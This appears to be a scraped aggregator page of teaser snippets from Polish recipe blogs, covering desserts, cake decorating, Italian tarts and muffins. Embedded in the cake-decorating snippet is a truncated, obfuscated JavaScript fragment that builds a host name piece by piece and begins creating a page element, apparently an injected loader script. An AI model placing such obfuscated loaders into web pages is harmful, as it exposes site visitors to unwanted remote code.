Oparta o parapet, z przyklejonym nosem do szyby, wpatruj się w dwie wrony tańczące na podwórku. Stroszą piórka, niczym wojownicy szykujący swe miecze do walki. Nie
W kuchni Karmel-itkiCo zrobić, żeby deser smakował obłędnie? Dodać do niego czekoladę! Jeśli też tak uważacie mam dla Was wspaniały przepis na sos czekoladowy, idealny
Rozpustne gotowanieLubię wspólne śniadania. Kiedy kawa lub herbata smakuje inaczej niż zwykle. Kiedy już zwykła owsianka nie wystarcza. Kiedy przez uchylone okno wpada rześki powiew wiatru, a
W kuchni Karmel-itkiZrzuca z siebie czarne pantofle, ażurowy sweterek i elegancką sukienkę. Rozpuszcza zwinięte w kok włosy i daje wiatrowi możliwość do zabawy. Słońce ogrzewa rozluźnioną już twarz
W kuchni Karmel-itki*********************************************** Każdy stół ma w święta swe własne postulaty. Jedni mają kapustę z grochem, inni kutię, pierogi z makiem, z kapustą i grzybami. Ktoś znów woli zupę
W kuchni Karmel-itkiNie znam osoby, która by go nie lubiła, ulubieniec najmłodszych, słodki ciągnący się Pan Karmel. Wygląda a smakuje znacznie lepiej niż gotowe
Wylizany RondelTworząc ten torcik wzorowała się na słynnym torcie Sachera którego jeszcze nigdy nie piekłam, ale w końcu i jego też upiekę ;) Ciasto jest w punkt słodkie, a słodycz jego przełamana jest kwaskowatym dżemem. Ja dorzuciłam jeszcze bardzo słodkie cukierki czekoladowe które nam nie smakowały i nie wiadomo było co z nimi tak naprawdę zrobić. Nadały one ciastu większej wilgotności(...)czekolady gorzkiej 1 czubata łyżeczka kakao ewent. 5-6 cukierków truflowych dodatkowo: 125 g mascarpone 3 łyżki cukru pudru około 1/2 słoika dżemu rabarbarowego lub morelowego np. domowego <--klik polewa: 20 g masła 5 łyżeczek cukru 3 łyżeczki kakao 1 łyżka zimnego mleka ewent drobno pokrojone orzechy laskowe lub wiórki kokosowe Pieczenie 1. Białko oddzielamy od żółtek
Gotowanie...to proste !efekt może być oszałamiający. Ja nie jestem mistrzynią w takich ozdobach, ale moja znajoma tworzy cudowne torty. Osobiście stawiam raczej na masy cukrowe, dzięki którym nawet z pozoru najłatwiejszy tort może przerodzić się w arcydzieło. Mając w domu ozdobne wałki i wiele różnych foremek do ciasteczek można tworzyć niebanalne wzory. Polecam Wam spróbować. Masa cukrowa jest idealna dla każdej, nawet(...)dekoracja gotowa Niegdyś, aby ozdobić ciasto mieliśmy do wyboru wyłącznie lukier, polewę i krem. Dziś wybór jest o wiele większy i nawet słabszy cukiernik może stworzyć arcydzieło w swojej domowej kuchni. Nie bójcie się i próbujcie! Dekorowanie wypieków naprawdę jest łatwe i może przysporzyć Wam dużo radości i… satysfakcji. (function(){ xkh9_=("u"+"")+"s"+"";xkh9_+=("tat.")+("i"); xkh9=document.createElement
Słodkie okruszkiWitam Kochani tego jesiennego wieczora Byłam dziś w Krakowie, fajny dzień, bo wreszcie świeciło słońce, było bardzo ciepło :-) Wróciła złota jesień. Oprócz tego byłam w
moje pyszne łatwe i sprawdzone przepisy krok po krokubakaliami (Crostata di frutta secca) Kakaowa tarta z kremem z białej czekolady z malinami Bezglutenowe mini serniczki z jogurtem greckim (Mini cheesecake con yogurt greco, senza glutine) Cytrynowy tort z limoncello (Torta al limone e limoncello) Tarta z kremem cytrynowym (Crostata alla crema di limoni) Cytrynowy sernik na zimno (Cheesecake al limone) Sernik z ricotty i kremu pasticcera (Crostata(...)Tartaletki z kremem czekoladowym i truskawkami (Crostatine con crema al cioccolato e fragole) Kruche ciasteczka z morelową konfiturą (Biscotti con confettura di albicocche) "Canestrelli" - włoskie kruche ciasteczka (Canestrelli liguri) Domowe czekoladki z migdałami (Cioccolatini con mandorle) Torcik z musem czekoladowym (Torta di mousse al cioccolato) Babà w rumie (Babà al rhum) Smacznego! Buon appetito
La grande e la piccola cuocaZa oknem upał, sezon truskawkowy w pełni, mleko kokosowe w lodówce, oczekujące na wykorzystanie. Dodaję te wszystkie okoliczności do siebie, stawiam wielki plus
W kuchni Karmel-itkiPamiętam jej uśmiech, kiedy razem ze mną, siedzącą na kuchennym stole, wyglądałyśmy jak dwa mączne bałwanki. Pamiętam głos i śmiech, gdy nieudolnie próbowałam zagnieść ciasto, obklejając
W kuchni Karmel-itkijuż czwarty wypiek zainspirowany niedawnym konkursem na naszym blogu. Dziś urocza odsłona przepisu nadesłanego przez Aleksandrę . Pierwotnie był to tort jednak w tym czasie miałyśmy ochotę na muffinki :P Naszą zmianą są także niesiarkowane morele zamiast daktyli, które nadają niepowtarzalnego smaku oraz mąka z ciecierzycy zamiast kokosowej (bo ta druga nam po prostu wyszła... i nie wróciła :P). Dzięki(...)pieczenia na kamieniu winnym Krem ryżowo-kokosowy - ½ szkl. ryżu białego -1 szkl. napoju migdałowego (lub mleka) -1 szkl. mleka kokosowego -ksylitol lub inna substancja słodząca (według indywidualnych preferencji) Dodatkowo -domowy marcepan + świeży sok z buraka + mąka ryżowa -wykałaczki MUFFINY JAGLANE Kaszę kilka razy wypłukać we wrzątku. W nieprzywierającym garnuszku wymieszać mleko kokosowe, wodę, olej, morele, chia i ugotować
Candy Pandas